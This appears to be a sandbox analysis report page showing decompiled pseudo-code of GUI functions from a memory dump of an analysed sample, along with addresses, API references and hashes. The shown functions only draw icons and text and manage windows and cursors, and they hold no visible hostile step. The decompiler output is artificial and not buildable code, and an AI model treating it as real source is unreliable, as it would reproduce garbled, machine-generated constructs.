				_t148 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t148 ^ _t346;
				_t150 = _a8;
				_v64 = __ecx;
				_v72 = _t150;
				_t255 = _a4;
				_v68 = _t255;
				_push(_t323);
				_push(_t308);
				if(_t150 == 0 ||  *((intOrPtr*)(_t150 + 4)) == 0) {
					E00CAA4E7(_t255, _t260, _t308, _t323, __eflags);
					asm("int3");
					_push(_t346);
					_push(_t255);
					_t256 = _t260;
					_t261 = _v104;
					_t152 =  *(_t261 + 0x5c);
					_v124 = _t152;
					__eflags = _t152;
					if(_t152 != 0) {
						_push(_t323);
						_push(_t308);
						asm("movsd");
						_t303 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t261 + 4)) + 8)) + 0x3c0));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						__eflags = _t303 - 0xffffffff;
						if(_t303 == 0xffffffff) {
							_t303 =  *((intOrPtr*)(_t256 + 0x94));
						}
						_v12 =  *((intOrPtr*)(_t261 + 0x54));
						_t258 = _v28 + _t303;
						asm("cdq");
						_t157 = _a8 - _t303;
						__eflags = _t157;
						_t326 = _t157 >> 1;
						if(_t157 < 0) {
							_t326 = 0;
							__eflags = 0;
						}
						_t310 =  *(_t261 + 0x58);
						_t263 = _v20 - _t310;
						asm("cdq");
						_t160 = _t263 - _t258 - _t303;
						__eflags = _t160;
						_t161 = _t160 >> 1;
						if(_t160 < 0) {
							_t161 = 0;
							__eflags = 0;
						}
						_t304 = _v0;
						_t264 = _t263 - _t161;
						__eflags = _t304;
						if(_t304 != 0) {
							_t304 =  *(_t304 + 4);
						}
						_t163 = _v32 + _t326;
						__eflags = _t163;
						return DrawIconEx(_t304, _t163, _t264, _v16, _v12, _t310, 0, 0, 3);
					}
					return _t152;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t165 = GetBkColor( *(_t255 + 8));
					_t313 = _v72;
					_t329 = _t165;
					if( *((intOrPtr*)(_t313 + 0x2c)) == 0) {
						_t265 =  *((intOrPtr*)(E00CC19ED() + 0x54));
					} else {
						_t265 =  *((intOrPtr*)(E00CC19ED() + 0x3c));
					}
					E00CC0A96(_t255, _t255, _t313, _t329,  &_v24);
					 *0xe17a64(_t329, _t265);
					 *((intOrPtr*)( *((intOrPtr*)( *_t255 + 0x2c))))();
					if( *((intOrPtr*)(_t313 + 0x5c)) == 0 ||  *((intOrPtr*)(_t313 + 0x54)) >= _v20 - _v24 - _v12 + _v16) {
						_t30 =  &_v88;
						 *_t30 = _v88 & 0x00000000;
						__eflags =  *_t30;
					} else {
						_v88 = 1;
						 *0xe17a64(_t255, _t313, 5, _a12, _a16, _a20);
						 *((intOrPtr*)( *((intOrPtr*)( *_v64 + 0x16c))))();
					}
					 *0xe17a64(E00CC19ED() + 0x12c);
					_v80 =  *((intOrPtr*)( *((intOrPtr*)( *_t255 + 0x28))))();
					GetTextColor( *(_t255 + 8));
					if(_a20 == 0 || _a12 == 0) {
						_t332 =  *((intOrPtr*)( *_t255 + 0x30));
						_t179 =  *((intOrPtr*)(_t313 + 0x60));
					} else {
						_t179 =  *((intOrPtr*)(_t313 + 0x64));
						_t332 =  *((intOrPtr*)( *_t255 + 0x30));
					}
					if(_t179 == 0xffffffff) {
						if( *((intOrPtr*)(_t313 + 0x2c)) == 0) {
							_t179 =  *((intOrPtr*)(E00CC19ED() + 0x70));
						} else {
							_t179 =  *((intOrPtr*)(E00CC19ED() + 0x6c));
						}
					}
					 *0xe17a64(_t179);
					_v60 =  *_t332();
					_v92 = E00CBA3B4(_t255, 1);
					_t275 =  *((intOrPtr*)( *((intOrPtr*)(_t313 + 4)) + 8));
					_t183 =  *((intOrPtr*)(_t275 + 0x3bc));
					_v76 = _t183;
					_v100 =  *((intOrPtr*)(_t275 + 0x3c0));
					if(_t183 == 0xffffffff) {
						_t183 =  *((intOrPtr*)(_v64 + 0x90));
						_v76 = _t183;
					}
					_t277 = _v72;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_v88 == 0) {
						_t305 = _t183;
					} else {
						_t305 =  *((intOrPtr*)(_t277 + 0x54)) + 5;
					}
					_v56 = _v24 + _t305;
					_t186 = _v100;
					if(_t186 == 0xffffffff) {
						_t186 =  *((intOrPtr*)(_v64 + 0x94));
					}
					_v52 = _v52 + _t186;
					_t306 = _v12;
					if(_a20 == 0) {
						_t315 = _v76;
					} else {
						_t315 = _t306 - _v20;
					}
					_t334 = _v48;
					_t316 = _v56;
					if(_t316 <= _t334 - _t315) {
						__eflags = _a20;
						if(_a20 == 0) {
							_t306 = _v76;
						} else {
							_t306 = _t306 - _v20;
						}
						_t335 = _t334 - _t306;
						__eflags = _t335;
						_v48 = _t335;
					} else {
						_v48 = _t316;
					}
					_t317 = _t277 + 8;
					E00CC1854(_t255, _t317,  &_v56, 0x24);
					E00CBA3B4(_t255, _v92);
					 *0xe17a64(_v80);
					 *((intOrPtr*)( *((intOrPtr*)( *_t255 + 0x28))))();
					_t337 =  *((intOrPtr*)( *_t255 + 0x30));
					 *0xe17a64(_v60);
					_t283 = _t255;
					_t197 =  *((intOrPtr*)( *((intOrPtr*)( *_t255 + 0x30))))();
					if(_a20 != 0) {
						_t197 =  *_t317;
						if( *((intOrPtr*)( *_t317 - 0xc)) != 0) {
							E00D0A216(_t283, _t306, _t317, _t337,  &_v84);
							asm("movsd");
							asm("cdq");
							asm("cdq");
							asm("movsd");
							_t211 =  ~(_v84 + 1 - _t306 >> 1) - (_v12 - _v20 + 1 - _t306 >> 1) + _v16;
							asm("movsd");
							_v60 = _t211;
							asm("movsd");
							if(_v24 > _t211) {
								_v60 = _v40;
							} else {
								_v40 = _t211;
							}
							_t320 = _v36;
							asm("cdq");
							asm("cdq");
							_t223 =  ~(_v80 + 1 - _t306 >> 1) - (_v28 - _t320 + 1 - _t306 >> 1) + _v28;
							if(_t320 <= _t223) {
								_t320 = _t223;
								_v36 = _t320;
							}
							_t197 = _v60 + _v84;
							_t291 = _v80 + _t320;
							_v32 = _t197;
							_v28 = _t291;
							if(_t197 <= _v16 && _t291 <= _v12) {
								if(_a12 != 0) {
									_t234 = E00CBA2B8(_t255, E00CC19ED() + 0xd0);
									_t235 = GetBkColor( *(_v68 + 8));
									_t236 = E00CC19ED();
									E00CC0750( &_v40,  *((intOrPtr*)(E00CC19ED() + 0x6c)),  *((intOrPtr*)(_t236 + 0x58)));
									 *0xe17a64(_t235);
									 *((intOrPtr*)( *((intOrPtr*)( *_v68 + 0x2c))))();
									_t255 = _v68;
									E00CBA2B8(_v68, _t234);
								}
								_v96 = 0;
								_v92 = 0;
								asm("sbb eax, eax");
								_t197 = E00D09E1A(_t255, 0, _t374, _t255, ( ~( *(_v72 + 0x30)) & 0xfffffff9) + 7,  &_v40, 0,  &_v96);
							}
						}
					}
					_pop(_t318);
					_pop(_t338);
					return E00DDCBCE(_t197, _t255, _v8 ^ _t346, _t306, _t318, _t338);
				}
			}

0x00cec5f4
0x00cec5f4
0x00cec5fa
0x00cec601
0x00cec604
0x00cec607
0x00cec60a
0x00cec60e
0x00cec611
0x00cec614
0x00cec615
0x00cec618
0x00cec961
0x00cec966
0x00cec967
0x00cec96d
0x00cec96e
0x00cec970
0x00cec973
0x00cec976
0x00cec979
0x00cec97b
0x00cec980
0x00cec981
0x00cec98b
0x00cec98c
0x00cec992
0x00cec993
0x00cec994
0x00cec995
0x00cec998
0x00cec99a
0x00cec99a
0x00cec9a6
0x00cec9a9
0x00cec9ae
0x00cec9af
0x00cec9af
0x00cec9b3
0x00cec9b5
0x00cec9b7
0x00cec9b7
0x00cec9b7
0x00cec9b9
0x00cec9bf
0x00cec9c5
0x00cec9c6
0x00cec9c6
0x00cec9c8
0x00cec9ca
0x00cec9cc
0x00cec9cc
0x00cec9cc
0x00cec9ce
0x00cec9d1
0x00cec9d3
0x00cec9d5
0x00cec9d7
0x00cec9d7
0x00cec9e7
0x00cec9e7
0x00000000
0x00cec9f6
0x00cec9f9
0x00cec628
0x00cec631
0x00cec632
0x00cec633
0x00cec634
0x00cec635
0x00cec63b
0x00cec63e
0x00cec644
0x00cec655
0x00cec646
0x00cec64b
0x00cec64b
0x00cec65f
0x00cec66c
0x00cec674
0x00cec67a
0x00cec6bb
0x00cec6bb
0x00cec6bb
0x00cec68d
0x00cec696
0x00cec6ae
0x00cec6b7
0x00cec6b7
0x00cec6d1
0x00cec6de
0x00cec6e1
0x00cec6eb
0x00cec6ff
0x00cec702
0x00cec6f3
0x00cec6f5
0x00cec6f8
0x00cec6f8
0x00cec708
0x00cec70e
0x00cec71f
0x00cec710
0x00cec715
0x00cec715
0x00cec70e
0x00cec725
0x00cec733
0x00cec73e
0x00cec741
0x00cec744
0x00cec750
0x00cec753
0x00cec759
0x00cec75e
0x00cec764
0x00cec764
0x00cec76e
0x00cec774
0x00cec775
0x00cec776
0x00cec777
0x00cec778
0x00cec782
0x00cec77a
0x00cec77d
0x00cec77d
0x00cec789
0x00cec78c
0x00cec792
0x00cec797
0x00cec797
0x00cec79d
0x00cec7a4
0x00cec7a7
0x00cec7b0
0x00cec7a9
0x00cec7ab
0x00cec7ab
0x00cec7b3
0x00cec7ba
0x00cec7bf
0x00cec7c6
0x00cec7ca
0x00cec7d1
0x00cec7cc
0x00cec7cc
0x00cec7cc
0x00cec7d4
0x00cec7d4
0x00cec7d6
0x00cec7c1
0x00cec7c1
0x00cec7c1
0x00cec7de
0x00cec7e5
0x00cec7ef
0x00cec7fe
0x00cec806
0x00cec80d
0x00cec812
0x00cec818
0x00cec81a
0x00cec820
0x00cec826
0x00cec82c
0x00cec836
0x00cec848
0x00cec849
0x00cec854
0x00cec857
0x00cec85e
0x00cec861
0x00cec862
0x00cec865
0x00cec869
0x00cec873
0x00cec86b
0x00cec86b
0x00cec86b
0x00cec879
0x00cec87f
0x00cec88a
0x00cec893
0x00cec898
0x00cec89a
0x00cec89c
0x00cec89c
0x00cec8a2
0x00cec8a8
0x00cec8aa
0x00cec8ad
0x00cec8b3
0x00cec8c6
0x00cec8d5
0x00cec8e2
0x00cec8ea
0x00cec905
0x00cec912
0x00cec91b
0x00cec91e
0x00cec923
0x00cec923
0x00cec932
0x00cec939
0x00cec941
0x00cec94b
0x00cec94b
0x00cec8b3
0x00cec82c
0x00cec953
0x00cec954
0x00cec95e
0x00cec95e

APIs

GetBkColor.GDI32(?), ref: 00CEC635
GetTextColor.GDI32(?), ref: 00CEC6E1
GetBkColor.GDI32(?), ref: 00CEC8E2
DrawIconEx.USER32 ref: 00CEC9EF

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Color$DrawIconText
String ID:
API String ID: 2759393849-0
Opcode ID: 73444a4f15c8693a39a61289acd534033ad49e91d15b131b824cd301f666c6aa
Instruction ID: f1f0707d07bf1f2bb499432ac3a78664051656293c207fbf46b087f4160e2005
Opcode Fuzzy Hash: 73444a4f15c8693a39a61289acd534033ad49e91d15b131b824cd301f666c6aa
Instruction Fuzzy Hash: 78E14875A002599FCF04CFA9C985AAEBBB6FF48314F144169E815AB391C770EE46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D036E5 Relevance: 6.4, APIs: 4, Instructions: 366
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00D036E5(void* __ebx, intOrPtr* __ecx, void* __edx, struct HWND__* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				struct HWND__* _v20;
				struct HWND__* _v24;
				struct HWND__* _v28;
				char _v32;
				char _v36;
				intOrPtr* _v76;
				void* _t128;
				signed int _t129;
				struct HICON__* _t142;
				struct HICON__* _t147;
				void* _t166;
				intOrPtr _t171;
				signed int _t177;
				intOrPtr _t182;
				struct HWND__* _t188;
				struct HWND__* _t190;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t214;
				void* _t236;
				intOrPtr _t243;
				intOrPtr _t252;
				intOrPtr* _t255;
				struct HWND__* _t256;
				struct HWND__* _t258;
				intOrPtr _t270;
				void* _t272;
				intOrPtr _t275;
				char* _t283;
				struct HWND__* _t284;
				intOrPtr* _t286;
				intOrPtr* _t289;
				struct HWND__* _t290;
				struct HWND__* _t291;
				void* _t320;
				struct HWND__* _t322;
				void* _t326;
				void* _t327;
				struct HWND__* _t329;
				struct HWND__* _t330;
				intOrPtr* _t331;
				void* _t332;
				intOrPtr* _t333;
				intOrPtr* _t334;
				struct HWND__* _t338;
				struct HWND__* _t341;
				struct HWND__* _t342;
				struct HWND__* _t344;
				intOrPtr* _t355;
				void* _t356;
				void* _t358;
				struct HWND__* _t359;
				void* _t375;
				void* _t379;

				_t379 = __eflags;
				_t343 = __esi;
				_t328 = __edi;
				_t259 = __ecx;
				_push(0x18);
				E00DDD55F(0xe09ded, __ebx, __edi, __esi);
				_t255 = __ecx;
				_t128 = E00CFCA95(__ecx, __ecx, __edx, __edi, _t379, _a8);
				_t380 = _t128 - 0xffffffff;
				if(_t128 != 0xffffffff) {
					_t344 = 0;
					_v32 = 0;
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					__eflags =  *(__ecx + 0x264);
					if( *(__ecx + 0x264) == 0) {
						L72:
						__eflags =  *((intOrPtr*)(_t255 + 0x260)) - _t344;
						if( *((intOrPtr*)(_t255 + 0x260)) != _t344) {
							_t328 = _t255 + 0x330;
							 *0xe17a64(0x50000000,  &_v32, _t255, 0xffffffff);
							 *((intOrPtr*)( *((intOrPtr*)( *(_t255 + 0x330) + 0x164))))();
							_t344 = 0;
							__eflags = 0;
						}
						__eflags =  *(_t255 + 0x250) - _t344;
						if(__eflags == 0) {
							_push(4);
							_push(_t255);
							_t345 = _t255 + 0xf8;
							_push(_t255 + 0xf8);
							_t129 = E00D0E6AD(_t255, _t328, _t255 + 0xf8, __eflags);
							__eflags = _t129;
							if(__eflags != 0) {
								_t149 = _t129 | 0xffffffff;
								__eflags = _t129 | 0xffffffff;
								E00CB7A83(_t345->i, 0xe86aa8, _t129 | 0xffffffff, _t129 | 0xffffffff, _t149, _t149, 0x13);
							}
						} else {
							_t345 =  *( *_t255 + 0x230);
							 *0xe17a64();
							E00CB9BC6(_t255, _t255 + 0x144, _t328, CreateSolidBrush( *( *( *_t255 + 0x230))()));
						}
						_push(4);
						_push(_t255);
						_push(_t255 + 0xfc);
						E00D0E6AD(_t255, _t328, _t345, __eflags);
						__eflags =  *(E00CC19ED() + 0xf0);
						if(__eflags == 0) {
							E00CACEEE(_t255, _t328, _t345, __eflags);
							_t147 = LoadCursorW( *(E00CACEEE(_t255, _t328, _t345, __eflags) + 0xc), 0x7904);
							_t345 = _t147;
							 *(E00CC19ED() + 0xf0) = _t147;
						}
						__eflags =  *(E00CC19ED() + 0xf4);
						if(__eflags == 0) {
							E00CACEEE(_t255, _t328, _t345, __eflags);
							_t142 = LoadCursorW( *(E00CACEEE(_t255, _t328, _t345, __eflags) + 0xc), 0x7905);
							 *(E00CC19ED() + 0xf4) = _t142;
						}
						_t346 =  *((intOrPtr*)( *_t255 + 0x178));
						 *0xe17a64();
						 *((intOrPtr*)( *((intOrPtr*)( *_t255 + 0x178))))();
						__eflags = 0;
						goto L83;
					} else {
						__eflags =  *(__ecx + 0x250);
						if( *(__ecx + 0x250) != 0) {
							_t342 = __ecx + 0x1300;
							 *0xe17a64(0xe4bcbb, 0x50000000,  &_v32, __ecx, 0xffffffff);
							 *((intOrPtr*)( *((intOrPtr*)(_t342->i + 0x164))))();
							E00CC7100(_t342, 0x12, 0, 0);
							 *((intOrPtr*)(__ecx + 0x1394)) = 0;
							_t320 = __ecx + 0x29fc;
							 *((intOrPtr*)(__ecx + 0x1380)) = 1;
							_t252 = 0;
							__eflags = _t342;
							if(__eflags != 0) {
								_t252 =  *((intOrPtr*)(_t342 + 0x20));
							}
							E00CBC02C(_t320, __eflags, _t252);
						}
						_t329 = _t255 + 0x3b0;
						 *0xe17a64(0xe4bcbb, 0x50000000,  &_v32, _t255, 0xffffffff);
						 *((intOrPtr*)( *((intOrPtr*)(_t329->i + 0x164))))();
						_t322 =  *(_t255 + 0x250);
						asm("sbb eax, eax");
						_t166 = ( ~_t322 & 0xffffffe9) + 0x17;
						__eflags =  *(_t255 + 0x254);
						if( *(_t255 + 0x254) != 0) {
							L39:
							_t270 = 0;
						} else {
							__eflags =  *(_t255 + 0x258);
							if( *(_t255 + 0x258) != 0) {
								goto L39;
							} else {
								__eflags = _t322;
								if(_t322 != 0) {
									goto L39;
								} else {
									_t270 = 4;
								}
							}
						}
						__eflags = _t322;
						E00CC7100(_t329, 0x11 + (0 | _t322 == 0x00000000) * 4, _t270, _t166);
						 *((intOrPtr*)(_t255 + 0x444)) = 0;
						 *((intOrPtr*)(_t255 + 0x430)) = 1;
						__eflags =  *(_t255 + 0x254);
						if( *(_t255 + 0x254) == 0) {
							__eflags =  *(_t255 + 0x258);
							if( *(_t255 + 0x258) == 0) {
								E00CC6CC7(_t329, 0x32);
							}
						}
						_t272 = _t255 + 0x29fc;
						_t171 = 0;
						__eflags = _t329;
						if(__eflags != 0) {
							_t171 =  *((intOrPtr*)(_t329 + 0x20));
						}
						E00CBC02C(_t272, __eflags, _t171);
						_t330 = _t255 + 0xb58;
						 *0xe17a64(0xe4bcbb, 0x50000000,  &_v32, _t255, 0xffffffff);
						 *((intOrPtr*)( *((intOrPtr*)(_t330->i + 0x164))))();
						_t177 =  *(_t255 + 0x250);
						asm("sbb edx, edx");
						_t326 = ( ~_t177 & 0xffffffea) + 0x16;
						__eflags =  *(_t255 + 0x254);
						if( *(_t255 + 0x254) != 0) {
							L49:
							_t275 = 0;
						} else {
							__eflags =  *(_t255 + 0x258);
							if( *(_t255 + 0x258) != 0) {
								goto L49;
							} else {
								__eflags = _t177;
								if(_t177 != 0) {
									goto L49;
								} else {
									_t275 = 4;
								}
							}
						}
						asm("sbb eax, eax");
						E00CC7100(_t330, ( ~_t177 & 0xfffffffa) + 0x14, _t275, _t326);
						 *((intOrPtr*)(_t255 + 0xbec)) = 0;
						 *((intOrPtr*)(_t255 + 0xbd8)) = 1;
						__eflags =  *(_t255 + 0x254);
						if( *(_t255 + 0x254) == 0) {
							__eflags =  *(_t255 + 0x258);
							if( *(_t255 + 0x258) == 0) {
								E00CC6CC7(_t330, 0x32);
							}
						}
						_t182 = 0;
						__eflags = _t330;
						if(__eflags != 0) {
							_t182 =  *((intOrPtr*)(_t330 + 0x20));
						}
						E00CBC02C(_t255 + 0x29fc, __eflags, _t182);
						__eflags =  *(_t255 + 0x250);
						if( *(_t255 + 0x250) != 0) {
							_t341 = _t255 + 0x1aa8;
							 *0xe17a64(0xe4bcbb, 0x50000000,  &_v32, _t255, 0xffffffff);
							 *((intOrPtr*)( *((intOrPtr*)(_t341->i + 0x164))))();
							E00CC7100(_t341, 0x13, 0, 0);
							 *((intOrPtr*)(_t255 + 0x1b3c)) = 0;
							_t243 = 0;
							 *((intOrPtr*)(_t255 + 0x1b28)) = 1;
							__eflags = _t341;
							if(__eflags != 0) {
								_t243 =  *((intOrPtr*)(_t341 + 0x20));
							}
							E00CBC02C(_t255 + 0x29fc, __eflags, _t243);
						}
						_t328 = _t255 + 0x2250;
						 *0xe17a64(0xe4bcbb, 0x50000000,  &_v32, _t255, 0xffffffff);
						 *((intOrPtr*)( *((intOrPtr*)(_t328->i + 0x164))))();
						_t344 = 0;
						__eflags =  *(_t255 + 0x254);
						if( *(_t255 + 0x254) != 0) {
							L63:
							_t188 = _t344;
						} else {
							__eflags =  *(_t255 + 0x258);
							if( *(_t255 + 0x258) != 0) {
								goto L63;
							} else {
								__eflags =  *(_t255 + 0x250);
								if( *(_t255 + 0x250) != 0) {
									goto L63;
								} else {
									_t188 = 4;
								}
							}
						}
						E00CC7100(_t328, 5, _t188, _t344);
						 *((intOrPtr*)(_t255 + 0x22e4)) = _t344;
						_t190 = _t344;
						 *((intOrPtr*)(_t255 + 0x22d0)) = 1;
						__eflags = _t328;
						if(__eflags != 0) {
							_t190 =  *((intOrPtr*)(_t328 + 0x20));
						}
						E00CBC02C(_t255 + 0x29fc, __eflags, _t190);
						__eflags =  *(_t255 + 0x250) - _t344;
						if( *(_t255 + 0x250) != _t344) {
							goto L72;
						} else {
							__eflags =  *((intOrPtr*)(_t255 + 0x264)) - _t344;
							if( *((intOrPtr*)(_t255 + 0x264)) == _t344) {
								goto L72;
							} else {
								E00CA67E1( &_v36);
								_t283 =  &_v36;
								_v4 = _t344;
								__eflags = E00CA2A90(_t283, 0x3ea0);
								if(__eflags == 0) {
									L84:
									E00CAA4E7(_t255, _t283, _t328, _t344, __eflags);
									asm("int3");
									_push(_t344);
									_t355 = _t283;
									_t284 = _t355 + 0x144;
									__eflags = _t284;
									if(_t284 != 0) {
										__eflags =  *(_t284 + 4);
										if( *(_t284 + 4) != 0) {
											E00CB9CCD(_t284);
										}
									}
									E00CB8008(_t355 + 0x29fc);
									E00D0E8B9(_t355 + 0x29fc, _t326, _t355 + 0xf8);
									E00D0E8B9(_t355 + 0x29fc, _t326, _t355 + 0xfc);
									_t286 = _t355;
									_pop(_t356);
									_t331 = _t286;
									 *0xe17a64();
									 *((intOrPtr*)( *((intOrPtr*)( *_t331 + 0x2bc))))();
									_t289 = _t331;
									_t332 = _t328;
									_t358 = _t356;
									_push(_t255);
									_push(_t358);
									_push(_t332);
									_t333 = _t289;
									_t256 =  *(_t333 + 0x70);
									__eflags = _t256;
									if(_t256 != 0) {
										 *0xe17a64(1);
										 *((intOrPtr*)( *((intOrPtr*)(_t256->i + 4))))();
									}
									_t290 =  *(_t333 + 0x2c);
									 *(_t333 + 0x70) = 0;
									__eflags = _t290;
									if(_t290 != 0) {
										 *0xe17a64(_t290, 0, 0);
										 *((intOrPtr*)( *((intOrPtr*)(_t290->i + 0xc))))();
									}
									_t291 =  *(_t333 + 0x28);
									__eflags = _t291;
									if(_t291 != 0) {
										 *0xe17a64(_t291);
										 *((intOrPtr*)( *((intOrPtr*)(_t291->i + 8))))();
										 *(_t333 + 0x28) = 0;
									}
									__eflags =  *(_t333 + 0x38);
									if( *(_t333 + 0x38) != 0) {
										_push(0);
										E00CB4D9F(_t333, 0);
									}
									_t258 =  *(_t333 + 0x7c);
									__eflags = _t258;
									if(__eflags != 0) {
										 *0xe17a64(1);
										 *((intOrPtr*)( *((intOrPtr*)(_t258->i + 4))))();
										_t27 = _t333 + 0x7c;
										 *_t27 =  *(_t333 + 0x7c) & 0x00000000;
										__eflags =  *_t27;
									}
									_t259 = _t333;
									_pop(_t328);
									_pop(_t343);
									_pop(_t255);
									_push(_t343);
									_t334 = _t259;
									_t327 = E00CADB0E(_t255, 0xe681ec, _t334, _t343, _t380, E00CAA535, _t328);
									if(_t327 == 0) {
										E00CAA4E7(_t255, 0xe681ec, _t334, _t343, __eflags);
										asm("int3");
										_push(_t343);
										_push(_t334);
										_t359 = 0;
										_t205 =  *0x00E6820C;
										__eflags = _t205;
										if(__eflags != 0) {
											L7:
											_push(_t359);
											_t206 = E00CB647F(_t255, 0xe681ec, _t327, 0xe681ec, _t359, __eflags);
											__eflags = _t206;
											if(__eflags == 0) {
												E00CAA4E7(_t255, 0xe681ec, 0xe681ec, _t359, __eflags);
												asm("int3");
												 *0xe17a64(0, 0xe681ec, _t359, _t375);
												return  *((intOrPtr*)( *((intOrPtr*)( *_v76 + 4))))();
											} else {
												_push( *0x00E6820C);
												_t9 = _t206 + 0x1c; // 0x1c
												E00CAF874(_t255, _t9, _t327);
												_t205 =  *0x00E6820C;
												__eflags = _t205;
												if(_t205 != 0) {
													goto L10;
												} else {
													goto L9;
												}
												goto L14;
											}
										} else {
											__eflags =  *0x00E68260;
											if( *0x00E68260 == 0) {
												L15:
												return _t205;
											} else {
												__eflags = _t205;
												if(__eflags == 0) {
													L9:
													__eflags =  *0x00E68260 - _t359;
													if( *0x00E68260 != _t359) {
														L10:
														_t338 =  *0x00E68260;
														__eflags = _t338;
														if(_t338 != 0) {
															 *0xe17a64();
															_t214 =  *((intOrPtr*)( *((intOrPtr*)(_t338->i + 0x58))))();
														} else {
															_t214 = DestroyWindow(_t205);
														}
														_t359 = _t214;
													}
													L14:
													_t205 = _t359;
													goto L15;
												} else {
													goto L7;
												}
											}
										}
									} else {
										 *0xe17a64( *((intOrPtr*)(_t327 + 0x5c)),  *((intOrPtr*)(_t327 + 0x60)),  *((intOrPtr*)(_t327 + 0x64)));
										return  *((intOrPtr*)( *((intOrPtr*)( *_t334 + 0x11c))))();
									}
								} else {
									E00CC7158(_t255, _t328, _t326, _v36);
									_t283 =  &_v36;
									__eflags = E00CA2A90(_t283, 0x3ea2);
									if(__eflags == 0) {
										goto L84;
									} else {
										E00CC7158(_t255, _t255 + 0x3b0, _t326, _v36);
										_t283 =  &_v36;
										__eflags = E00CA2A90(_t283, 0x3ea3);
										if(__eflags == 0) {
											goto L84;
										} else {
											_t236 = E00CC7158(_t255, _t255 + 0xb58, _t326, _v36);
											_v4 = _v4 | 0xffffffff;
											E00CA2975(_t236, _v36 - 0x10);
											_t344 = 0;
											__eflags = 0;
											goto L72;
										}
									}
								}
							}
						}
					}
				} else {
					__eax = __eax;
					L83:
					return E00DDD50E(_t255, _t328, _t346);
				}
			}

0x00d036e5
0x00d036e5
0x00d036e5
0x00d036e5
0x00d036e5
0x00d036ec
0x00d036f1
0x00d036f7
0x00d036fc
0x00d036ff
0x00d03708
0x00d0370a
0x00d0370d
0x00d03710
0x00d03713
0x00d03716
0x00d0371c
0x00d03a57
0x00d03a57
0x00d03a5d
0x00d03a61
0x00d03a7b
0x00d03a83
0x00d03a85
0x00d03a85
0x00d03a85
0x00d03a87
0x00d03a8d
0x00d03ab8
0x00d03aba
0x00d03abb
0x00d03ac1
0x00d03ac2
0x00d03ac7
0x00d03ac9
0x00d03acd
0x00d03acd
0x00d03adb
0x00d03adb
0x00d03a8f
0x00d03a91
0x00d03a99
0x00d03ab1
0x00d03ab1
0x00d03ae0
0x00d03ae2
0x00d03ae9
0x00d03aea
0x00d03af4
0x00d03afb
0x00d03afd
0x00d03b10
0x00d03b16
0x00d03b1d
0x00d03b1d
0x00d03b28
0x00d03b2f
0x00d03b31
0x00d03b44
0x00d03b51
0x00d03b51
0x00d03b59
0x00d03b61
0x00d03b69
0x00d03b6b
0x00000000
0x00d03722
0x00d03722
0x00d03728
0x00d0372a
0x00d0374b
0x00d03753
0x00d0375d
0x00d03762
0x00d03768
0x00d0376e
0x00d03778
0x00d0377a
0x00d0377c
0x00d0377e
0x00d0377e
0x00d03782
0x00d03782
0x00d03787
0x00d037a8
0x00d037b0
0x00d037b2
0x00d037bc
0x00d037c3
0x00d037c6
0x00d037cc
0x00d037df
0x00d037df
0x00d037ce
0x00d037ce
0x00d037d4
0x00000000
0x00d037d6
0x00d037d6
0x00d037d8
0x00000000
0x00d037da
0x00d037dc
0x00d037dc
0x00d037d8
0x00d037d4
0x00d037e4
0x00d037f4
0x00d037f9
0x00d037ff
0x00d03809
0x00d0380f
0x00d03811
0x00d03817
0x00d0381d
0x00d0381d
0x00d03817
0x00d03822
0x00d03828
0x00d0382a
0x00d0382c
0x00d0382e
0x00d0382e
0x00d03832
0x00d03837
0x00d03858
0x00d03860
0x00d03862
0x00d0386c
0x00d03873
0x00d03876
0x00d0387c
0x00d0388f
0x00d0388f
0x00d0387e
0x00d0387e
0x00d03884
0x00000000
0x00d03886
0x00d03886
0x00d03888
0x00000000
0x00d0388a
0x00d0388c
0x00d0388c
0x00d03888
0x00d03884
0x00d03894
0x00d038a0
0x00d038a5
0x00d038ab
0x00d038b5
0x00d038bb
0x00d038bd
0x00d038c3
0x00d038c9
0x00d038c9
0x00d038c3
0x00d038ce
0x00d038d0
0x00d038d2
0x00d038d4
0x00d038d4
0x00d038de
0x00d038e3
0x00d038e9
0x00d038eb
0x00d0390c
0x00d03914
0x00d0391e
0x00d03923
0x00d03929
0x00d0392b
0x00d03935
0x00d03937
0x00d03939
0x00d03939
0x00d03943
0x00d03943
0x00d03948
0x00d03969
0x00d03971
0x00d03973
0x00d03975
0x00d0397b
0x00d03992
0x00d03992
0x00d0397d
0x00d0397d
0x00d03983
0x00000000
0x00d03985
0x00d03985
0x00d0398b
0x00000000
0x00d0398d
0x00d0398f
0x00d0398f
0x00d0398b
0x00d03983
0x00d0399a
0x00d0399f
0x00d039a5
0x00d039a7
0x00d039b1
0x00d039b3
0x00d039b5
0x00d039b5
0x00d039bf
0x00d039c4
0x00d039ca
0x00000000
0x00d039d0
0x00d039d0
0x00d039d6
0x00000000
0x00d039d8
0x00d039db
0x00d039e5
0x00d039e8
0x00d039f0
0x00d039f2
0x00d03b75
0x00d03b75
0x00d03b7a
0x00d03b7b
0x00d03b7c
0x00d03b7e
0x00d03b84
0x00d03b86
0x00d03b88
0x00d03b8c
0x00d03b8e
0x00d03b8e
0x00d03b8c
0x00d03b99
0x00d03ba5
0x00d03bb1
0x00d03bb6
0x00d03bb8
0x00cfcadc
0x00cfcae8
